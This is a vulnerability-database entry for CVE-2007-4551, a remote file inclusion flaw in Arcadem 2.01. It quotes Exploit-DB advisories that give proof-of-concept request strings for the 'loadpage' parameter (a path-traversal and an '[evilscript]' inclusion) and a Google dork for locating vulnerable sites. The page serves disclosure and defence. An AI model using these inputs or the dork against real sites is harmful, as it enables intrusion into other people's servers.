CVE-2007-4551
published 2007-08-28CVE-2007-4551: PHP remote file inclusion vulnerability in index.php in Agares Media Arcadem 2.01 allows remote attackers to execute arbitrary PHP code via a URL in the…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.02%
85.8th percentile
PHP remote file inclusion vulnerability in index.php in Agares Media Arcadem 2.01 allows remote attackers to execute arbitrary PHP code via a URL in the loadpage parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| agares_media | arcadem | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Arcadem 2.01 - SQL Injection / Remote File Inclusion
exploitdb·2007-08-27
CVE-2007-4551 Arcadem 2.01 - SQL Injection / Remote File Inclusion
Arcadem 2.01 - SQL Injection / Remote File Inclusion
---
Arcadem Remote File Inclusion Flaw / SQL Injection
Software: Arcadem 2.01
Vendor link: http://agaresmedia.com
Attack: Remote File Inclusion / SQL Injection
Original advisory:
http://14house.blogspot.com/2007/08/arcadem-rfi-sql-injection-flaws.html
Discovered by: David Sopas Ferreira a.k.a SmOk3
Google dork:"Powered by AMCMS3"
Remote File Inclusion
It is possible for a remote attacker to include a file from local or
remote resources and/or execute arbitrary script code with the
privileges of the webserver.
Proof of Concept:
index.php?loadpage=../../../../file
index.php?loadpage=[evilscript]
Solution:
Edit the source code to ensure that input is properly validated. Where
is possible, it is recommended to make a list of accept
Exploit-DB
Arcadem 2.01 - 'index.php' Remote File Inclusion
exploitdb·2007-08-24
CVE-2007-4551 Arcadem 2.01 - 'index.php' Remote File Inclusion
Arcadem 2.01 - 'index.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/25432/info
Arcadem is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Arcadem 2.01 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?loadpage=[evilscript]
No writeups or analysis indexed.
http://14house.blogspot.com/2007/08/arcadem-rfi-sql-injection-flaws.htmlhttp://forums.agaresmedia.com/viewtopic.php?f=13&t=19http://osvdb.org/36856http://secunia.com/advisories/26574http://www.securityfocus.com/bid/25432http://14house.blogspot.com/2007/08/arcadem-rfi-sql-injection-flaws.htmlhttp://forums.agaresmedia.com/viewtopic.php?f=13&t=19http://osvdb.org/36856http://secunia.com/advisories/26574http://www.securityfocus.com/bid/25432
2007-08-28
Published